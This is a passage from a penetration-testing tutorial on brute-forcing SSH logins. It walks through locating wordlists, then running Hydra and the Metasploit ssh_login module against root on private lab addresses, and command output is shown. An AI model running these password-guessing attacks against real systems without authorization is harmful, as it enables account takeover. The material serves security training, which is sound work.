9.4 : Pre exploitation - Pre password cracking

Crack the password over the internet

Sometimes if the target didnt expose any hashed password or vulnerabilities,

we can use brute forcing attack for cracking the password itself.

It is a last resort since it will generate large amount of traffic & noise.

Tools

-
Password dictionary

  • In kali, we can use wordlists as a keyword to search through the password.

  • or you can download it from the internet, build it yourself is also a option.

  • Password cracker

  • Burp

  • Metasploit

  • hydra

  • A lot of tools can achieve it

Example - cracking ssh

Locate wordlist, pick one, or build one. Its up to you.

root@kali:~# locate wordlist | head -n 20
/usr/bin/wordlists
/usr/sbin/remove-default-wordlist
/usr/sbin/select-default-wordlist
/usr/sbin/update-default-wordlist
/usr/share/wordlists
/usr/share/applications/kali-wordlists.desktop
/usr/share/dict/README.select-wordlist
/usr/share/dict/wordlist-top4800-probable.txt
/usr/share/dirb/wordlists
/usr/share/dirb/wordlists/big.txt
/usr/share/dirb/wordlists/catala.txt
/usr/share/dirb/wordlists/common.txt
/usr/share/dirb/wordlists/euskera.txt
/usr/share/dirb/wordlists/extensions_common.txt
/usr/share/dirb/wordlists/indexes.txt
/usr/share/dirb/wordlists/mutations_common.txt
/usr/share/dirb/wordlists/others
/usr/share/dirb/wordlists/small.txt
/usr/share/dirb/wordlists/spanish.txt
/usr/share/dirb/wordlists/stress
...

Hydra

root@kali:~# hydra -h
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O        use old SSL v2 and v3
  -q        do not print messages about connection errors
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql
nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:[email protected]:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh
  

Start cracking it

root@kali:~# locate wordlist | grep password | head -n 20
/usr/share/metasploit-framework/data/wordlists/hci_oracle_passwords.csv
/usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt
/usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv
/usr/share/metasploit-framework/data/wordlists/password.lst
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt
root@kali:~# wc -l /usr/share/metasploit-framework/data/wordlists/password.lst
88397 /usr/share/metasploit-framework/data/wordlists/password.lst
root@kali:~# hydra -v -l root -P /usr/share/metasploit-framework/data/wordlists/password.lst -t 1 192.168.56.103 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-04 23:54:14
[DATA] max 1 task per 1 server, overall 1 task, 88397 login tries (l:1/p:88397), ~88397 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://[email protected]:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.103:22

now just wait for it, it takes time to crack.

It will prompt you the results upon completion.


Metasploit

> msfconole
> search ssh

msf5 > search ssh

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/dos/windows/ssh/sysax_sshd_kexchange              2013-03-17       normal     No     Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
   1   auxiliary/fuzzers/ssh/ssh_kexinit_corrupt                                    normal     No     SSH Key Exchange Init Corruption
   2   auxiliary/fuzzers/ssh/ssh_version_15                                         normal     No     SSH 1.5 Version Fuzzer
   3   auxiliary/fuzzers/ssh/ssh_version_2                                          normal     No     SSH 2.0 Version Fuzzer
   4   auxiliary/fuzzers/ssh/ssh_version_corrupt                                    normal     No     SSH Version Corruption
   5   auxiliary/scanner/http/cisco_firepower_login                                 normal     Yes    Cisco Firepower Management Console 6.0 Login
   6   auxiliary/scanner/http/gitlab_user_enum                     2014-11-21       normal     Yes    GitLab User Enumeration
   7   auxiliary/scanner/ssh/apache_karaf_command_execution        2016-02-09       normal     Yes    Apache Karaf Default Credentials Command Execution
   8   auxiliary/scanner/ssh/cerberus_sftp_enumusers               2014-05-27       normal     Yes    Cerberus FTP Server SFTP Username Enumeration
   9   auxiliary/scanner/ssh/detect_kippo                                           normal     Yes    Kippo SSH Honeypot Detector
   10  auxiliary/scanner/ssh/eaton_xpert_backdoor                  2018-07-18       normal     Yes    Eaton Xpert Meter SSH Private Key Exposure Scanner
   11  auxiliary/scanner/ssh/fortinet_backdoor                     2016-01-09       normal     Yes    Fortinet SSH Backdoor Scanner
   12  auxiliary/scanner/ssh/juniper_backdoor                      2015-12-20       normal     Yes    Juniper SSH Backdoor Scanner
   13  auxiliary/scanner/ssh/karaf_login                                            normal     Yes    Apache Karaf Login Utility
   14  auxiliary/scanner/ssh/libssh_auth_bypass                    2018-10-16       normal     Yes    libssh Authentication Bypass Scanner
   15  auxiliary/scanner/ssh/ssh_enumusers                                          normal     Yes    SSH Username Enumeration
   16  auxiliary/scanner/ssh/ssh_identify_pubkeys                                   normal     Yes    SSH Public Key Acceptance Scanner
   17  auxiliary/scanner/ssh/ssh_login                                              normal     Yes    SSH Login Check Scanner
   18  auxiliary/scanner/ssh/ssh_login_pubkey                                       normal     Yes    SSH Public Key Login Scanner
   19  auxiliary/scanner/ssh/ssh_version                                            normal     Yes    SSH Version Scanner
....

> use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/password.lst
pass_file => /usr/share/metasploit-framework/data/wordlists/password.lst
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 auxiliary(scanner/ssh/ssh_login) > set username root
username => root
msf5 auxiliary(scanner/ssh/ssh_login) > exploit

Just like that.

And the scanning should be it.

Another tips for pwn,
DON'T WASTE YOUR TIME WHILE BRUTE FORCING.

Try another stuff, do more recon, look for vulnerable endpoints.

Try more.